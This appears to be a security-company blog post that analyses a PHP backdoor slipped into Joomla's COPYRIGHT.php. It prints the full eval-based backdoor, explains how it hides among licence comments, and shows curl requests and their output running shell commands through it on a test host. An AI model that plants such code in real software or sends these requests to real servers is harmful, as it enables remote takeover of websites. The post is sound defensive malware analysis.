6 SHARES Facebook Twitter

Malware code can be very small, and the impact can be very severe! In our daily tasks we find a lot of web-based malware that varies in size and impact. Some of the malware is well known and very easy to detect, others not so much, but this one is very interesting.

Here’s the backdoor, can you see what it’s doing?



< ?php /* GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. .. GNU GENERAL PUBLIC LICENSE Version 2, June 1991 */Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too.*/?> Joomla! derives from copyrighted works licensed under the GNU General Public License. This version has been modified pursuant to the GNU General Public License as of September 15, 2005, and as distributed, it includes or is derivative of works licensed under the GNU General Public License or other free or open source software licenses. Please see the CREDITS.php for a non-exhaustive list of contributors and copyright holders. A full text version of the GNU GPL version 2 can be found in the LICENSE.php file. A full text version of the other licenses that Joomla! is derivative of or includes can be found in LICENSES.php. <? php Copyright3_6_56(); function Copyright3_6_56(){ static $gnu = true; if(!$gnu) return; if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return; $gpl=implode('', $_REQUEST['gnu']); eval ($gpl( $_REQUEST['c_id'])); $gnu=false; }

Breaking the code down – Reducing the noise

This particular backdoor was inserted into a good file, the COPYRIGHT.php file in Joomla core. We are going to break the code down into 3 parts and explain in details each part of it.

1- First part (Deceiving)

In this section the bad guys inserted this “comment”:

/* GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. .. GNU GENERAL PUBLIC LICENSE Version 2, June 1991 */Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too.*/?>

At a first glance, it doesn’t seem to have anything wrong with it, right? If your eyes didn’t catch it, they inserted the function execution between the comments:

*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc.

This first part of backdoor is executing a function called Copyright3_6_56() that will be declared later on somewhere else in the code.

2 – Second Part (Holy)

This one is the simplest and there’s no mystery to it. As I mentioned early on, they inserted the malicious code within a good file. In this particular case the file is the original core file COPYRIGHT.php from Joomla 1.5.x.

/** * @version $Id: COPYRIGHT.php 14401 2010-01-26 14:10:00Z louis $ * @package Joomla * @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. */ defined('_JEXEC') or die('Restricted access'); Joomla! derives from copyrighted works licensed under the GNU General Public License. This version has been modified pursuant to the GNU General Public License as of September 15, 2005, and as distributed, it includes or is derivative of works licensed under the GNU General Public License or other free or open source software licenses. Please see the CREDITS.php for a non-exhaustive list of contributors and copyright holders. A full text version of the GNU GPL version 2 can be found in the LICENSE.php file. A full text version of the other licenses that Joomla! is derivative of or includes can be found in LICENSES.php.

3- Third Part (Juicy)

This is what you came here for.

Copyright3_6_56(); function Copyright3_6_56(){ static $gnu = true; if(!$gnu) return; if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return; $gpl=implode('',$_REQUEST['gnu']); eval ($gpl($_REQUEST['c_id'])); $gnu=false; }

If you are a PHP Programmer or security guy this part may be really obvious, but if you are not, you are probably thinking:

“This is part of the copyright file, isn’t it? It was there so the code may belong to that file”

“I don’t see any issues with it”

“Why am I editing this file”

All jokes aside, this is the part where the attacker declares the function and exactly what it does.

function Copyright3_6_56(){

static $gnu = true;

if(!$gnu) return;

if(!isset($_REQUEST[‘gnu’])||!isset($_REQUEST[‘c_id’]))return;

$gpl=implode(”,$_REQUEST[‘gnu’]);

eval ($gpl($_REQUEST[‘c_id’]));

$gnu=false;

}

This code is really bad and allows attackers to execute commands in your server via specific parameters.

The line ‘eval ($gpl($_REQUEST[‘c_id’]));’ is the perfect scenario for different kind of injections, for example:

eval (system(CMD));

eval (passthru(CMD));

eval (base 64 _decode(BASE 64));

Let’s show an example of how dangerous it can be:

Encoding the malicious command

------------------------------------------------------ rodrigo@core:~$ echo "system('uname -a; id');"|base 64 c3lzdGVtKCd1bmFtZSAtYTsgaWQnKTsK ------------------------------------------------------

Executing commands remotely

----------------------------------------------------------------------------------------------------------------------------------- rodrigo@core:~$ curl -s -d "gnu[]=base 64_decode&c_id=c3lzdGVtKCd1bmFtZSAtYTsgaWQnKTsK" "http://192.168.0.1/COPYRIGHT.php" Linux core 3.2.0-25-generic #40-Ubuntu SMP Wed May 23 20:30:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux uid=33(www-data) gid=33(www-data) groups=33(www-data) Restricted access -- or -- rodrigo@core:~$ curl -s -d "gnu[]=system&c_id=uname -a;id" "http://192.168.0.1/COPYRIGHT.php" Linux core 3.2.0-25-generic #40-Ubuntu SMP Wed May 23 20:30:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux uid=33(www-data) gid=33(www-data) groups=33(www-data) Restricted access -----------------------------------------------------------------------------------------------------------------------------------

In regards to logs, unless you are specially monitoring the content of POST requests, this all you will see:

--------------------------------------------------------------------------------------------------------------------------- - access log 192.168.0.1 - - [31/Jul/2013:18:53:21 -0700] "POST /COPYRIGHT.php HTTP/1.1" 200 378 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3" ---------------------------------------------------------------------------------------------------------------------------

The attackers could also use $_GET, but it would be easier to detect by the content of c_id:

--------------------------------------------------------------------------------------------------------------------------- rodrigo@core:~$ curl -s -d "gnu[]=base 64_decode" "http://192.168.0.1/COPYRIGHT.php?c_id=c3lzdGVtKCd1bmFtZSAtYTsgaWQnKTsK" Linux core 3.2.0-25-generic #40-Ubuntu SMP Wed May 23 20:30:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux uid=33(www-data) gid=33(www-data) groups=33(www-data) Restricted access

Here is the entry in the access_log:

192.168.0.1 - - [31/Jul/2013:19:19:08 -0700] "POST /COPYRIGHT.php?c_id=c3lzdGVtKCd1bmFtZSAtYTsgaWQnKTsK HTTP/1.1" 200 368 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3" ---------------------------------------------------------------------------------------------------------------------------

Easy Conclusion

Our conclusion is simple, this is plain sneaky, and a lot to consider here. This is especially tricky being the backdoor was sneakily placed in a regular copyright file within core of an open source software. The regular eye may not have spotted this, and in turn would have been susceptible to arbitrary execution of code on their website by attackers.

If you have any questions, please don’t hesitate to contact us!